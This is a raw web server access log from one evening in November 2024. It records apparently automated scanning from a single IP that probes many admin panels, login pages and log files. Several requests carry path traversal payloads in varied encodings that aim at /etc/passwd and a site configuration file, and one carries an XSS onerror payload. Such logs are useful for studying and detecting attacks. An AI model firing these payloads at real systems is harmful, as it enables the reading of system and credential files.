195.164.49.69 - - [18/Nov/2024:22:35:40 +0000] GET /sessions/new HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:35:42 +0000] GET /access.log HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:35:44 +0000] GET /login.jsp HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:35:45 +0000] GET /webclient/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:35:49 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [18/Nov/2024:22:35:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:35:50 +0000] GET /events/EventRsvp.aspx HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:35:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:35:54 +0000] GET /common_page/login.html HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:35:56 +0000] GET /index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:35:58 +0000] GET /debug/pprof/goroutine?debug=1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:36:00 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:36:02 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:36:04 +0000] GET /app/kibana HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:36:06 +0000] GET /rsso/admin/ HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:36:08 +0000] GET /elmah HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:36:10 +0000] GET /production.log HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:36:12 +0000] GET /npm-debug.log HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:36:14 +0000] GET /index.do HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:36:16 +0000] GET /jkstatus HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:36:18 +0000] GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:36:20 +0000] GET /host-manager/html HTTP/1.1 403 3022
195.164.49.69 - - [18/Nov/2024:22:36:22 +0000] GET /webredir.nsf HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:36:24 +0000] GET /jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:36:26 +0000] GET /?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:28 +0000] GET /uddiexplorer/ HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:36:30 +0000] GET /log/access.log HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:36:33 +0000] GET /auth/admin HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:36:34 +0000] GET /euweb/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:36:36 +0000] GET /elmah.axd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:36:38 +0000] GET /assets/npm-debug.log HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:36:40 +0000] GET /jkstatus; HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:36:41 +0000] GET /?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:43 +0000] GET /logs/access.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:36:46 +0000] GET /auth/admin/master/console/ HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:36:47 +0000] GET /?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:49 +0000] GET /application/logs/access.log HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:36:51 +0000] GET /?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:53 +0000] GET /?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:55 +0000] GET /?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:57 +0000] GET /?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:36:59 +0000] GET /?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:37:01 +0000] GET /?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:37:03 +0000] GET /?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:37:05 +0000] GET /?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:37:07 +0000] GET /image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:37:09 +0000] GET /image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:37:11 +0000] GET /file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:37:13 +0000] GET /file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:37:15 +0000] GET /image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:37:16 +0000] GET /image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:37:18 +0000] GET /file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:37:20 +0000] GET /file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:37:22 +0000] GET /?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:37:33 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:37:35 +0000] GET /vpn/index.html HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:37:36 +0000] GET /web HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:37:38 +0000] GET /jupyter/login HTTP/1.1 404 1091
83.212.98.101 - - [18/Nov/2024:22:37:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:37:40 +0000] GET /templates/login.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:37:42 +0000] GET /~login HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:37:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:37:46 +0000] GET /api/version HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:37:48 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:37:50 +0000] GET /phpMyAdmin/index.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:37:51 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:37:53 +0000] GET /documentation HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:37:55 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:37:57 +0000] GET /ui/sessions/signin HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:37:59 +0000] GET /jasperserver/login.html?error=1 HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:38:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:38:04 +0000] GET /phpmyadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:38:04 +0000] GET /admin/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:38:04 +0000] GET /_phpmyadmin/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /apache-default/phpmyadmin/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /blog/phpmyadmin/ HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /forum/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /php/phpmyadmin/ HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /typo3/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:38:05 +0000] GET /web/phpmyadmin/ HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:38:06 +0000] GET /xampp/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:38:06 +0000] GET /phpMyAdmin/ HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:38:06 +0000] GET /phpma/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:38:08 +0000] GET /Main_Login.asp HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:38:10 +0000] GET /admin/spider.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:38:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:38:13 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [18/Nov/2024:22:38:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:38:18 +0000] GET /portal.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:38:21 +0000] GET /labkey/home/login-login.view HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:38:24 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:38:28 +0000] GET /webshell4/login.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:38:30 +0000] GET /console HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:38:49 +0000] GET /fileman/index.html HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:38:52 +0000] GET /pandora_console/mobile/ HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:38:54 +0000] GET /geoserver/web/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:38:55 +0000] GET /jupyter/lab HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:38:57 +0000] GET /lam/templates/login.php HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:38:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:39:01 +0000] GET /ui/login/ HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:39:03 +0000] GET /api/v1/settings HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:39:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:39:07 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:39:09 +0000] GET /documentation/login HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:39:11 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:39:13 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:39:15 +0000] GET /jasperserver-pro/login.html?error=1 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:39:17 +0000] GET /currentsetting.htm HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:39:19 +0000] GET /sphider/admin/admin.php HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:39:21 +0000] GET /Login.jsp HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:39:22 +0000] GET /opscenter/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:39:25 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:39:27 +0000] GET /portal/portalhelp/en/ HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:39:29 +0000] GET /login/home/login.view HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:39:31 +0000] GET /wps/portal HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:39:33 +0000] GET /browser/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:39:35 +0000] GET /graph HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:39:37 +0000] GET /cgi-bin/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:39:39 +0000] GET /fileman/php/fileslist.php HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:39:41 +0000] GET /StudioServer/server/apps/login.php HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:39:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:39:45 +0000] GET /jupyter/hub/lti/launch HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:39:47 +0000] GET /index.php?owa_do=base.loginForm HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:39:49 +0000] GET /?path=/settings/about HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:39:51 +0000] GET /interface/login/login.php?site=default HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:39:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:39:54 +0000] GET /ocsreports HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:39:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:39:59 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:40:01 +0000] GET /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:40:03 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:40:05 +0000] GET /login?next HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:40:07 +0000] GET /login.do HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:40:09 +0000] GET /search/admin/admin.php HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:40:11 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:40:13 +0000] GET /web/database/selector/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:40:14 +0000] GET /plugins/CoreHome/images/favicon.png HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:40:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:40:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:40:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:40:22 +0000] GET /mobile/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:40:24 +0000] GET /prometheus/graph HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:40:26 +0000] GET /cgi-bin/html/login.html HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:40:28 +0000] GET /fileman/asp_net/main.ashx HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:40:30 +0000] GET /server/apps/login.php HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:40:33 +0000] GET /front/privateLogin.jsp HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:40:34 +0000] GET /hub/login HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:40:36 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:40:38 +0000] GET /en/login HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:40:40 +0000] GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:40:42 +0000] GET /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:40:44 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:40:45 +0000] GET /druid/login.html HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:40:48 +0000] GET /login.sh HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:40:50 +0000] GET /adminer/ HTTP/1.1 404 1086
83.212.98.101 - - [18/Nov/2024:22:40:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:40:52 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:40:54 +0000] GET /sws/index.html HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:40:56 +0000] GET /login/login.do HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:40:58 +0000] GET /host-manager/html HTTP/1.1 403 3022
195.164.49.69 - - [18/Nov/2024:22:41:00 +0000] GET /login.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:41:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:04 +0000] GET /webapps/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:41:06 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:41:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:10 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:41:12 +0000] GET /signin HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:41:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:18 +0000] GET /em/console/ias/oc4j/home HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:41:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:22 +0000] GET /ui/login HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:41:24 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:41:26 +0000] GET /mlb/ HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:41:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:30 +0000] GET /nagios HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:41:32 +0000] GET /filr/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:41:34 +0000] GET /hub HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:41:36 +0000] GET /sws/index.sws HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:41:38 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:41:40 +0000] GET /editor.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:41:42 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:41:43 +0000] GET /manager/login.do HTTP/1.1 404 1545
195.164.49.69 - - [18/Nov/2024:22:41:45 +0000] GET /webmail/login/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:41:47 +0000] GET /manager/status HTTP/1.1 401 2499
195.164.49.69 - - [18/Nov/2024:22:41:50 +0000] GET /app/login HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:41:51 +0000] GET /qmailadmin/qmailadmin.cgi HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:41:53 +0000] GET /websrvs/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:41:54 +0000] GET /DocuWare/Identity/Account/Login HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:41:57 +0000] GET /sonicui/7/login/ HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:41:59 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:42:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:42:03 +0000] GET /CHANGELOG.md HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:42:05 +0000] GET /centreon/index.php HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:42:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:42:09 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:42:11 +0000] GET /pem/login/pages/login.jsf HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:42:13 +0000] GET /MyDevice/Login HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:42:15 +0000] GET /mylittlebackup/ HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:42:17 +0000] GET /static/dist/assets/icons/icon.png HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:22:42:19 +0000] GET /nagios3 HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:42:21 +0000] GET /login HTTP/1.1 404 1079
